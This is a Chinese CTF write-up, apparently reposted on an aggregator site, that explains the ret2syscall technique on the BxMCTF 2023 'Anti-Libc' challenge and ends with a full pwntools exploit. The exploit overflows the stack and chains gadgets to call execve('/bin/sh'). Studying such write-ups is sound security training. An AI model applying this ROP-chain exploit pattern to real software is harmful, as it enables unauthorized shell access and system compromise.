CTF-栈溢出-基本ROP-【ret2syscall】

文章目录

  • ret2syscall
  • BxMCTF 2023 Anti-Libc
    • main
    • write_buf
    • flush_obuf
    • readint
    • read_buf
  • 思路
  • exp

ret2syscall

即控制程序执行系统调用,获取 shell。

BxMCTF 2023 Anti-Libc

main

在这里插入图片描述

write_buf

写入字符的,待会输出
在这里插入图片描述

flush_obuf

把字符输出到屏幕
在这里插入图片描述

readint

输入要接下来要输入的数的长度,正负号会相应的判断和跳转
在这里插入图片描述

read_buf

如果发现start和end相同时,重写输入,否则返回输入的数据所在数组的一个start位置所在的字节
这里的sys_read存在很明显的溢出
在这里插入图片描述

思路

不是我说,这坨shit真的绕(我太菜了)
shit之处在于汇编的源码最后的那个循环中有个inc r10,然后IDA没有,直接原地继续赋值EMMMMMMMM
在这里插入图片描述
在这里插入图片描述
发现这个bug后题目就轻松很多了

查看文件静态链接
在这里插入图片描述
查看保护(不符合老外的出题特色了都)
在这里插入图片描述
肯定溢出构造ROP链嘛,然后系统调用嘛

32位和64位的syscall原理都是一样
只有传参和调用存在差异,以下一起说,做个对比
32位系统调用使用 " int 80h "
64位系统调用使用 " syscall " (汇编代码就是syscall 直接ROPgadget–only查找即可)
32的系统调用号与64位的不大一样 使用的时候最好百度一下
比如
32位 #define __NR_execve 11
64位 #define __NR_execve 59
32位的系统调用号放在eax 传参依次是 EBX、ECX、EDX、ESI、EDI、EBP
64位的系统调用号放在rax 传参依次是 RDI、RSI、RDX、R10、R8、R9 (和64位函数传参一样)

首先找rdi嘛
在这里插入图片描述
0x0000000000401135入选
看看 jmp 0x401106
在这里插入图片描述
有ret但是esi的值会减1,rdi的值会加1
emmm但会构造一下应该就好了
rax试试
在这里插入图片描述
寄了
eax试试
在这里插入图片描述
寄了
ax
在这里插入图片描述
寄了
al
在这里插入图片描述
也寄了
只能反汇编了找了

在这里插入图片描述
找到了
在这里插入图片描述
看看对应位置的汇编代码
在这里插入图片描述
发现需要构造%ebx寄存器
正好下面有一个
在这里插入图片描述
美哉 美哉
那最后咋调用系统调用呢?
发现这里有个move %rbp %rsp,那么如果之前存储的rbp合适的话,那么可以继续ROP,rbp应该为在syscall调用前的前十六个字节,因为还要有pop rbp和pop rbx得抵消掉

exp

很shit的一点是。。。忘记两次sendline如果时间过短会被程序当作一次性接受了

from pwn import *
#context(os="linux",arch="amd64",log_level="debug")
e = ELF("./main")
p = process("./main")
#p = gdb.attach(p, "b*main")
offset = 64  
input_buf = 0x402020
onemore = b"\x00"
BIN_SH = b"/bin/sh\x00"
EVIL = onemore + BIN_SH 
DUMMY_RBP = p64(1)  #随便填
DUMMY_RBX = p64(1)  #随便填
SYSCALL = p64(0x401055)
EVIL_ADDRESS = input_buf +len(DUMMY_RBP + DUMMY_RBX + SYSCALL)#作为rdi
POP_RSI_RDI = p64(0x401135)  # pop rsi ; pop rdi ; jmp 0x401106
POP_RBX = p64(0x40109C)
MOV_EBX_EAX = p64(
    0x40108D
)  # mov %ebx,%eax ; neg %ebx; cmpb $0x1,(%rsp); cmove %ebx,%eax ; mov %rbp,%rsp ; pop %rbp ; pop %rbx; ret
RSI = p64(1)
RDI = p64(EVIL_ADDRESS)
RBX = p64(0x3B)  # it'll go into RAX which is needed for correct syscall
RBP = p64(input_buf)  # 最后的MOV_EBX_EAX这个地方最后有mov %rbp,%rsp ; pop %rbp ; pop %rbx; ret从而可以执行系统调用


payload = DUMMY_RBP + DUMMY_RBX + SYSCALL + EVIL
padding = b"A" * (offset - len(DUMMY_RBP + DUMMY_RBX + SYSCALL + EVIL))
payload += padding + RBP + POP_RSI_RDI + RSI + RDI
payload += POP_RBX + RBX + MOV_EBX_EAX
print(len(payload))
print(p.recvuntil("input? "))
p.sendline(str(len(payload)))
sleep(3)   # 防止间隔时间太多被当作一次性发过去了
p.sendline(payload)
p.interactive()

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/172122.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

前景一片蓝海,Android音视频开发必备基础知识汇总

前景一片蓝海,Android音视频开发必备基础知识汇总

转瞬间,2023 已慢慢步入深冬,回首过去一年,音视频技术在经历一番风浪的侵袭过后,变得逐渐相对平静下来。 “内卷”之外,大家似乎更多了一份“理性”指导我们去做一些正确的事,追求技术在商业中的更高价值。…
阅读更多...
华为ac+fit无线2层漫游配置案例

华为ac+fit无线2层漫游配置案例

ap的管理dhcp在ac上,业务dhcp在汇聚交换机上、并且带2层漫游 R1: interface GigabitEthernet0/0/0 ip address 11.1.1.1 255.255.255.0 ip route-static 12.2.2.0 255.255.255.0 11.1.1.2 ip route-static 192.168.0.0 255.255.0.0 11.1.1.2 lsw1: vlan batch 100…
阅读更多...
[AutoSar]在Davinci Configurator中导入Dbc Cdd 文件

[AutoSar]在Davinci Configurator中导入Dbc Cdd 文件

目录 关键词平台说明一、实现步骤1.1 添加相关模块1.2 导入文件1.3 加载完成后点next而不是finish1.4 更新配置1.5 解决错误 关键词 嵌入式、C语言、autosar 平台说明 项目ValueOSautosar OSautosar厂商vector芯片厂商TI编程语言C,C编译器HighTec (GCC) 一、实现…
阅读更多...
SpringCloud原理-OpenFeign篇(二、OpenFeign包扫描和FeignClient的注册原理)

SpringCloud原理-OpenFeign篇(二、OpenFeign包扫描和FeignClient的注册原理)

文章目录 前言正文一、从启动类开始二、EnableFeignClients 的源码分析三、Import FeignClientsRegistrar 的作用四、FeignClientsRegistrar#registerFeignClients(...)五、饥饿注册&懒注册 FeignClientsRegistrar#registerFeignClient(...)六、通过Holder真正注册beanDefi…
阅读更多...
kafka原理看这一篇就够了

kafka原理看这一篇就够了

为何使用消息队列 异步。接口方式实现多个系统协作,如图A系统作为用户请求接收方,需要调用多个系统的接口,这些接口还有可能是在A系统里同步调用,所以最后的接口耗时是多个系统接口耗时的总和;mq方式则可以异步发送消…
阅读更多...
终于有人把数据资产入表知识地图总结出来了,轻松看懂

终于有人把数据资产入表知识地图总结出来了,轻松看懂

在当前数字化的浪潮下,数据已经成为劳动、土地、知识、技术以后的第五大生产要素,“数据就是资源”已成为共识。如今数据资产“入表”已成定局,数据资产化迫在眉睫。 2023年8月21日,财政部正式印发《企业数据资源相关会计处理暂行…
阅读更多...
[Linux] 进程入门

[Linux] 进程入门

💻文章目录 📄前言计算机的结构体系与概念冯诺依曼体系结构操作系统概念目的与定位 进程概念描述进程-PCBtask_struct检查进程利用fork创建子进程 进程状态进程状态查看僵尸进程孤儿进程 📓总结 📄前言 作为一名程序员&#xff0c…
阅读更多...
Django学习日志09

Django学习日志09

choices参数的使用 """对于以上可能被我们列举完的字段我们一般都是选择使用choices参来做""" class UserInfo(models.Model):username models.CharField(max_length64)password models.CharField(max_length32)# 先写一个映射关系gender_cho…
阅读更多...
从零开始的搭建指南:开发高效的抖音预约服务小程序

从零开始的搭建指南:开发高效的抖音预约服务小程序

预约服务小程序提高了效率,节省了用户时间。下文,小编将与大家一同探讨如何从零开始打造预约服务小程序。 第一步:明确需求和目标 确定你的小程序主要服务领域是什么?是医疗预约、美容美发、餐厅预订还是其他行业?明…
阅读更多...
【C++ 学习 ㊴】- 详解 C++ 的 I/O 流

【C++ 学习 ㊴】- 详解 C++ 的 I/O 流

目录 一、C 的 I/O 流 二、C 的标准 I/O 流 三、C 的文件 I/O 流 一、C 的 I/O 流 C 语言有一套完成数据读写(I/O)的解决方案: 使用 scanf()、gets() 等函数从键盘读取数据,使用 printf()、puts() 等函数向屏幕输出数据&#…
阅读更多...
Web前端—移动Web第三天(移动Web基础、rem、less、综合案例—极速问诊)

Web前端—移动Web第三天(移动Web基础、rem、less、综合案例—极速问诊)

版本说明 当前版本号[20231120]。 版本修改说明20231120初版 目录 文章目录 版本说明目录移动 Web 第三天01-移动 Web 基础谷歌模拟器屏幕分辨率视口二倍图适配方案 02-rem简介媒体查询rem 布局flexible.jsrem 移动适配 03-less注释运算嵌套变量导入导出禁止导出 04-综合案例…
阅读更多...
【用unity实现100个游戏之16】Unity程序化生成随机2D地牢游戏2(附项目源码)

【用unity实现100个游戏之16】Unity程序化生成随机2D地牢游戏2(附项目源码)

文章目录 先看看最终效果前言生成走廊生成房间修复死胡同增加走廊宽度获取走廊位置信息集合方法一方法二 源码完结 先看看最终效果 前言 上期已经实现了房间的生成,本期紧跟着上期内容,生成走廊并结合上期内容生成连通的房间。 生成走廊 修改Procedur…
阅读更多...
WPF Button点击鼠标左键弹出菜单

WPF Button点击鼠标左键弹出菜单

目录 ContextMenu介绍WPF实现点击鼠标左键弹出菜单如何禁用右键菜单如何修改菜单样式菜单位置设置 本篇博客介绍WPF点击按钮弹出菜单,效果如下: 菜单的位置、央视可以自定义。 实现技巧:不在xaml里菜单,在按钮左键按下的点击事件里…
阅读更多...
Linux系统编程 系统编程概念

Linux系统编程 系统编程概念

1.系统调用 系统调用(system call)其实是 Linux 内核提供给应用层的应用编程接口(API),是 Linux 应用层进入内核的入口。不止 Linux 系统,所有的操作系统都会向应用层提供系统调用,应用程序通过…
阅读更多...
每日汇评:美日在两个月低点附近似乎较为脆弱,熊市可能会在FOMC会议纪要公布前暂停

每日汇评:美日在两个月低点附近似乎较为脆弱,熊市可能会在FOMC会议纪要公布前暂停

美元/日元跌至两个月低点,并受到多种因素的压力; 美联储鸽派预期和美国债券收益率下降继续令美元承压; 美日利差缩小以及日本央行政策转变的押注提振了日元; 美元/日元货币对在周二持续第四天承受着沉重的卖压,同时也标…
阅读更多...
jenkins-2.426.1-1.1.noarch.rpm 的公钥没有安装

jenkins-2.426.1-1.1.noarch.rpm 的公钥没有安装

执行命令 yum install jenkins 报错 jenkins-2.426.1-1.1.noarch.rpm 的公钥没有安装 下载的软件包保存在缓存中,直到下次成功执行事务。 您可以通过执行 yum clean packages 删除软件包缓存。 错误:GPG 检查失败 解决办法: 1、安装新的公…
阅读更多...
Linux上通过SSL/TLS和start tls连接到LDAP服务器(附C++代码实现认证流程)

Linux上通过SSL/TLS和start tls连接到LDAP服务器(附C++代码实现认证流程)

一,大致流程。 1.首先在Linux上搭建一个LDAP服务器 2.在LDAP服务器上安装CA证书,服务器证书,因为SSL/TLS,start tls都属于机密通信,需要客户端和服务器都存在一个相同的证书认证双方的身份。3.安装phpldapadmin工具&am…
阅读更多...
集群创建(flannel)时候,没有自动创建出cni0网卡

集群创建(flannel)时候,没有自动创建出cni0网卡

给旧的集群加入四台新的服务器启动时候发现都是正常的,但是pod通信报错 集群通信失败,第一时刻想看看是不是cni0和flannel.1的网段是不是通的,点进去一看发现cni0网卡没有生成。 部署是通过kubeadm方式部署的集群,目前有两种解决…
阅读更多...
数据库表的内连接和外连接

数据库表的内连接和外连接

1.内连接查询语法 -- 隐式内链接 SELECT 字段列表 FROM 表1,表2WHERE 条件; -- 显示内连接 select 字段列表 from 表1 [inner] join 表2 on 条件; 如果两个表没用进行内连接,会生成笛卡尔积。A集合和B集合全部元素进行排列组合。 …
阅读更多...
Oracle数据库安装踩坑记录

Oracle数据库安装踩坑记录

Oracle数据库安装踩坑记录 踩坑目录 可能会用到的教程1. 管理员用户(sys)登录oracle命令2. 默认密码:三个 如果忘记改密码参考 1. 登录后修改密码3. 查看账号密码:只有sys用户登录后才能查看4. sqldeveloper 连接oracle数据库5. o…
阅读更多...
最新文章

Copyright @ 2022~2023